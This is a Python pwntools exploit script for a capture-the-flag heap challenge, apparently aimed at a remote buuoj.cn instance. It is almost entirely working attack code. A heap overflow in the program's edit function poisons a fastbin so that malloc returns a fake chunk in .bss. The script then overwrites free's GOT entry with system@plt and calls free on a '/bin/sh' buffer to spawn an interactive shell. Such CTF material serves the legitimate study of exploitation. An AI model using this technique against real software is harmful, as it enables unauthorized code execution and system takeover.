from pwn import *

# Global pwntools setup: verbose protocol logging, 64-bit Linux target.
context.update(log_level='debug', os='linux', arch='amd64')
# Open the debugger in a side-by-side pane of the current tmux window.
context.terminal = ["tmux", "splitw", "-h"]

# Swap the two commented lines in to run against a local copy of the binary
# (and attach gdb) instead of the remote CTF instance.
# io = process("./pwn")
elf = ELF("./pwn")
io = remote("node5.buuoj.cn", 25734)
# gdb.attach(io)


def se(data):
    """Send raw *data* with no trailing newline."""
    return io.send(data)


def sa(delim, data):
    """Wait for *delim* on the wire, then send raw *data*."""
    return io.sendafter(delim, data)


def sl(data):
    """Send *data* followed by a newline."""
    return io.sendline(data)


def sla(delim, data):
    """Wait for *delim* on the wire, then send *data* plus a newline."""
    return io.sendlineafter(delim, data)


def rc(num):
    """Receive up to *num* bytes."""
    return io.recv(num)


def rl():
    """Receive one line."""
    return io.recvline()


def ru(delims):
    """Receive everything up to and including *delims*."""
    return io.recvuntil(delims)


def uu32(data):
    """Unpack a little-endian u32 from *data*, zero-padding short input."""
    return u32(data.ljust(4, b'\x00'))


def uu64(data):
    """Unpack a little-endian u64 from *data*, zero-padding short input."""
    return u64(data.ljust(8, b'\x00'))


def ia():
    """Drop into an interactive session on the connection."""
    return io.interactive()


def get_64():
    """Read up to the next 0x7f byte and unpack the trailing 6 bytes as a
    64-bit value -- the usual way to pull a leaked userland/libc pointer
    (0x00007f.. prefix) off the wire."""
    leaked = io.recvuntil(b'\x7f')[-6:]
    return u64(leaked.ljust(8, b'\x00'))


def get_32():
    """Read up to the next 0xf7 byte and unpack the trailing 4 bytes as a
    32-bit value (32-bit libc pointers typically start with 0xf7)."""
    leaked = io.recvuntil(b'\xf7')[-4:]
    return u32(leaked.ljust(4, b'\x00'))
def add(size, content):
    """Menu option 1: allocate a chunk of *size* bytes filled with *content*.

    *content* is passed straight to pwntools, so it may be str or bytes;
    nothing is returned.
    """
    sla("Your choice :", '1')
    sla("Size of Heap : ", f"{size}")
    sla("Content of heap:", content)
def edit(idx, size, content):
    """Menu option 2: rewrite chunk *idx* with *size* bytes of *content*.

    The program takes the write length from us, not from the chunk, which is
    what the exploit relies on for the heap overflow.
    """
    sla("Your choice :", '2')
    sla("Index :", f"{idx}")
    sla("Size of Heap : ", f"{size}")
    sla("Content of heap : ", content)
def free(idx):
    """Menu option 3: free chunk *idx*."""
    sla("Your choice :", '3')
    sla("Index :", f"{idx}")
# --- Exploit: heap overflow in edit() -> fastbin attack -> GOT overwrite of free ---
# All addresses are hard-coded (0x6020ad, elf.got/elf.plt without a base), so this
# assumes a non-PIE binary. The fake chunk at 0x6020ad needs a size byte of 0x7f
# (fastbin index for 0x70 chunks) at 0x6020b5 -- presumably the high byte of a
# pointer in .bss -- and a fastbin without tcache in front of it (glibc 2.23 era).
# NOTE(review): confirm both in gdb before relying on this script.
CHUNK_SZ = 0x60
FAKE_CHUNK = 0x6020ad

add(CHUNK_SZ, 'aaaa')  # idx 0: its slot pointer will later be redirected to free@got
add(CHUNK_SZ, 'aaaa')  # idx 1: starts with "/bin/sh" and is the overflow source
add(CHUNK_SZ, 'aaaa')  # idx 2: freed into the 0x70 fastbin
free(2)

# Overflow from chunk 1 into chunk 2's header: 8 + 0x60 = 0x68 bytes of user data,
# then chunk 2's size (kept at 0x71) and its fd, which now points at the fake chunk.
overflow = b''.join([
    b'/bin/sh\x00',
    cyclic(CHUNK_SZ),
    p64(0x71),
    p64(FAKE_CHUNK),
])
edit(1, len(overflow), overflow)

add(CHUNK_SZ, 'aaaa')  # takes chunk 2 back out of the fastbin
add(CHUNK_SZ, 'aaaa')  # malloc now hands out the fake chunk (index 3 below)

# Through the fake chunk, overwrite the table slot that holds chunk 0's pointer
# with the address of free@got (0x23 is the assumed distance from the fake
# chunk's data to that slot -- verify against the binary).
redirect = cyclic(0x23) + p64(elf.got['free'])
edit(3, len(redirect), redirect)

# Editing chunk 0 now writes system@plt over free@got.
got_write = p64(elf.plt['system'])
edit(0, len(got_write), got_write)

# free(1) therefore calls system("/bin/sh").
free(1)
io.interactive()